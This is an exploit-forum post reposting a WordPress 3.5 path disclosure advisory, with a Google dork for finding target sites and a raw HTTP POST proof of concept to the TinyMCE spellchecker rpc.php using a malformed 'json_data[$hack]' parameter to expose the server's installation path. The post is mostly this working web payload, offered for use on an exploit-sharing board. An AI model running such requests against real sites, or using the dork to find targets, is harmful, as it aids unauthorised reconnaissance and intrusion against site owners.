Jump to content
wind

WordPress 3.5 Path Disclosure Vulnerability

By wind, in Exploituri

Recommended Posts

wind Newbie

wind

Posted
Posted 
# Exploit Title: WordPress 3.5 Path Disclosure Vulnerability
# Date: 01/19/2013
# Google Dork: intext:"powered by WordPress"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-3.5.txt
# Vendor Homepage: http://wordpress.org/
# Software Link: http://wordpress.org/latest.zip
# Version: 3.5 and probably prior
# Tested on: Windows

Description:

Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the WordPress installation.

Proof of Concept:

--------------------------------------

POST /wordpress/wp-includes/js/tinymce/plugins/spellchecker/rpc.php HTTP/1.1
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

json_data[$hack]=1

--------------------------------------

Done!

Proof: http://goo.gl/PPhWf

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...